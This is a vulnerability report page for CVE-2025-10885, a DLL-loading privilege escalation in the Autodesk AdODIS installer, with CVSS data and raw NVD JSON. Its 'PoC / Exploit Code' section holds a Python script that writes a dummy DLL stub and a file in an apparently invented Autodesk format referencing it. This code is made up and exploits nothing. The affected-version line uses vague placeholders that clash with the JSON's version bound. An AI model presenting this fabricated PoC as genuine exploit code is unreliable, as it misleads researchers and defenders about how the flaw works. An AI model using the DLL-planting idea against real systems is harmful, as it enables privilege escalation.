Security Vulnerability Report
中文
CVE-2025-10885 CVSS 7.8 HIGH

CVE-2025-10885

Published: 2025-11-06 17:15:42
Last Modified: 2025-11-12 14:34:48

Description

A maliciously crafted file, when executed on the victim's machine, can lead to privilege escalation to NT AUTHORITY/SYSTEM due to an insufficient validation of loaded binaries. An attacker with local and low-privilege access could exploit this to execute code as SYSTEM.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:autodesk:installer:*:*:*:*:*:*:*:* - VULNERABLE
Autodesk AdODIS < 最新版本
Autodesk软件受影响的版本(具体版本需参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10885 PoC Concept # This is a conceptual PoC demonstrating the binary loading vulnerability # Actual exploitation requires specific Autodesk software environment import os import struct def create_malicious_dll(): """Create a malicious DLL that will be loaded by vulnerable software""" dll_content = b'MZ' + b'\x00' * 58 + struct.pack('<I', 0x1000) dll_content += b'Dummy DLL for CVE-2025-10885\x00' dll_content += b'\x00' * (1024 - len(dll_content)) with open('malicious.dll', 'wb') as f: f.write(dll_content) return 'malicious.dll' def create_malicious_file(): """Create a malicious file that triggers vulnerable binary loading""" # This would be a specially crafted Autodesk file format # containing references to load the malicious DLL malicious_content = b'ADSK_FILE_FORMAT\x00' malicious_content += b'BINARY_REFERENCE:malicious.dll\x00' with open('malicious.adsk', 'wb') as f: f.write(malicious_content) return 'malicious.adsk' def setup_exploit(): """Setup files needed for exploitation""" dll = create_malicious_dll() file = create_malicious_file() print(f'Created: {dll}, {file}') print('When victim opens malicious.adsk, malicious.dll will be loaded') if __name__ == '__main__': setup_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10885", "sourceIdentifier": "[email protected]", "published": "2025-11-06T17:15:42.313", "lastModified": "2025-11-12T14:34:48.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A maliciously crafted file, when executed on the victim's machine, can lead to privilege escalation to NT AUTHORITY/SYSTEM due to an insufficient validation of loaded binaries. An attacker with local and low-privilege access could exploit this to execute code as SYSTEM."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:autodesk:installer:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.19", "matchCriteriaId": "84BEDF60-A39D-4C7E-BE93-D23390AF80AE"}]}]}], "references": [{"url": "https://emsfs.autodesk.com/utility/odis/1/installer/latest/AdODIS-installer.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0022", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}